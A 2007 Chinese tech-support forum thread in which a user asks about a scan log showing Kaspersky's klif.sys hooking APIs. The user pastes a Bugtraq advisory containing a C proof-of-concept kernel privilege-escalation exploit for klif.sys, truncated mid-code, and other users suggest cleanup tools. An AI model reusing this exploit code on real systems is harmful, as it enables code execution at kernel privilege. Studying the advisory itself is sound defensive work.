帮忙看下分析 看下有什么可疑的！~~~

jbz85

如题谢谢！~~~QQ频繁掉线      老要输入验证   而防火墙拦截到的只有十几条  不多啊   我没下载  不应该那么频繁掉啊！~~~鼠标有时间自己会慢慢的动？？？闷  扫描了下  帮忙看下 谢谢！！~
=================================
API HOOK
RVA  错误： LoadLibraryA (危险等级: 高,  被下面模块所HOOK: \??\C:\WINDOWS\system32\drivers\klif.sys)
RVA  错误： LoadLibraryExA (危险等级: 高,  被下面模块所HOOK: \??\C:\WINDOWS\system32\drivers\klif.sys)
RVA  错误： LoadLibraryExW (危险等级: 高,  被下面模块所HOOK: \??\C:\WINDOWS\system32\drivers\klif.sys)
RVA  错误： LoadLibraryW (危险等级: 高,  被下面模块所HOOK: \??\C:\WINDOWS\system32\drivers\klif.sys)
RVA  错误： GetProcAddress (危险等级: 高,  被下面模块所HOOK: \??\C:\WINDOWS\system32\drivers\klif.sys)

jbz85

Kaspersky Labs Kaspersky Antivirus 5.0.335 Kaspersky Labs Kaspersky Antivirus 5.0.228 Kaspersky Labs Kaspersky Antivirus 5.0.227 描述： ------------------------------------------ BUGTRAQ ID: _blank>13878 Kaspersky是一款非常流行的杀毒软件。 Microsoft Windows 2000平台的Kaspersky软件设计上存在漏洞，本地攻击者可能利用此漏洞提升自己的权限。 起因是Kaspersky内核驱动klif.sys没有正确丢弃高权限，攻击者可能利用这个漏洞以系统内核的权限执行任意代码。 <*来源：Ilya Rabinovich （info@softsphere.com） 链接：_blank>http://marc.theaimsgroup.com/?l=bugtraq&amp;m=111817777430401&w=2 *> 测试方法： ------------------------------------------ 警 告 以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ //(C) by Ilya Rabinovich. #include PUCHAR pCodeBase=(PUCHAR)0xBE9372C0; PDWORD pJmpAddress=(PDWORD)0xBE9372B0; PUCHAR pKAVRets[]={(PUCHAR)0xBE935087,(PUCHAR)0xBE935046}; PUCHAR pKAVRet; unsigned char code[]={0x68,0x00,0x02,0x00,0x00, //push 0x200 0x68,0x00,0x80,0x93,0xBE, //push - 0xBE938000 0x6A,0x00, //push 0 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +13 0xFF,0xD0, //call eax 0x68,0x00,0x80,0x93,0xBE, //push 0x68,0x00,0x82,0x93,0xBE, //push - 0xBE938200 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +30 0xFF,0xD0, //call eax 0x85,0xC0, //test eax,eax 0x74,0x03, //je +03 0xC2,0x04,0x00, //retn 4 0x6A,0x00, //push 0 0x68,0x00,0x84,0x93,0xBE, //push - 0xBE938400 0x68,0x00,0x84,0x93,0xBE, //push - 0xBE938400 0x6A,0x00, //push 0 0xB8,0x00,0x00,0x00,0x00, //mov eax, -> +58 0xFF,0xD0, //call eax 0xC2,0x04,0x00 //retn 4 }; unsigned char jmp_code[]={0xFF,0x25,0xB0,0x72,0x93,0xBE}; //jmp dword prt \ [0xBE9372B0] ////////////////////////////////////////////////////////////// BOOLEAN LoadExploitIntoKernelMemory(void){ //Get function's addresses HANDLE hKernel=GetModuleHandle("KERNEL32.DLL"); HANDLE hUser=GetModuleHandle("USER32.DLL"); FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA"); FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA"); FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA"); *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA; *(DWORD*)(code+30)=(DWORD)plstrcmpiA; *(DWORD*)(code+58)=(DWORD)pMessageBoxA; //Prepare our data into ring0-zone. PCHAR pNotepadName=(PCHAR)0xBE938200; char temp_buffer[MAX_PATH]; char *s; SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s); lstrcpy(pNotepadName,temp_buffer); PCHAR pMessage=(PCHAR)0xBE938400; lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!"); memmove(pCodeBase,code,sizeof(code)); *pJmpAddress=(DWORD)pCodeBase; memmove(pKAVRet,jmp_code,sizeof(jmp_code)); return TRUE; } /////////////////////////////////////////////////////////////// void UnloadExploitFromKernelMemory(){ UCHAR retn_4[]={0xC2,0x04,0x00}; memmove(pKAVRet,retn_4,sizeof(retn_4)); } ///////////////////////////////////////////////////////////////// PUCHAR GetKAVRetAddress(void){ //Check the retn 4 in the KAV 0xBE9334E1 function end //Also, we check the KAV klif.sys existance. UCHAR retn_4[]={0xC2,0x04,0x00}; __try{ for(DWORD i=0;ihttp://www.kaspersky.com/

jbz85

不明白 我开始装的时间就是125了   还有这个漏洞？？？

shenrenrenren

没有这个漏洞了。

风雪

用xdelbox(http://www.i170.com/attach/97670969-F47C-4A8B-9529-F0F602EFA902下载)删除下面文件（按住鼠标左键向下拖动，用鼠标从第一行拖动从上往下到最后一行，右键复制，或者（添入“文件路径”点击“添加”路径），在xdelbox窗口空白处点右键-从剪贴板导入,在抑制再生前打钩,在要删除文件上点击右键，选择立刻重启删除,运行xdelbox前最好卸载所有可移动存储介质（包括U盘，MP3，手机存储卡等））。
C:\DOCUMENTS AND SETTINGS\ALL USERS\「开始」菜单\程序\IE\IE.EXE

Windows清理助手、恶意软件清理助手清理恶意软件升级查一下：
http://www.arswp.com/download/arswp2/arswp2.zip

jbz85

哦 谢谢前面的了   忘记说了哦   那IE是世界之窗 我把它放到程序里面了和快速启动  桌面
  那还有没有别的问题 ？？

jbz85

如果把咔吧的这个给删了后  咔吧能运行不？？手动删不了  感觉在安全模式下应该可以

[ 本帖最后由 jbz85 于 2007-10-5 13:39 编辑 ]

风雪

QQ是什么版本，新版本也会掉线么。提示是什么有异地登陆么？如果是IE是世界之窗 就不用删除了。ftp://ftp.drweb.com/pub/drweb/cureit/cureit.exe
找几个插件清理工具清理一下。如金山清理专家。

jbz85

插件有个阅读器的  还有迅雷的     不过其中那个迅雷帮助插件卸不了  兔子卸有时间还有  除非把它哪个高级模块也卸了！~~~QQ是珊瑚虫最后的版本  另外你知道它的IP怎么更新不   我找不到它IP库记录的位置！~~~~~想用别的IP库来替换！~~
QQ掉 是在玩对站平台CS时    现在还没掉一次  BT下载也不掉

jbz85

昨晚准备关机睡觉的时候突然蓝屏重起了  以前IE7崩溃了几次 蓝屏一两次  我回帖突然说网页连接失败  点重试后就重起了   之前我发现网速突然之间几乎为零  迅雷的速度几百B！~~~~~不明白是怎么会事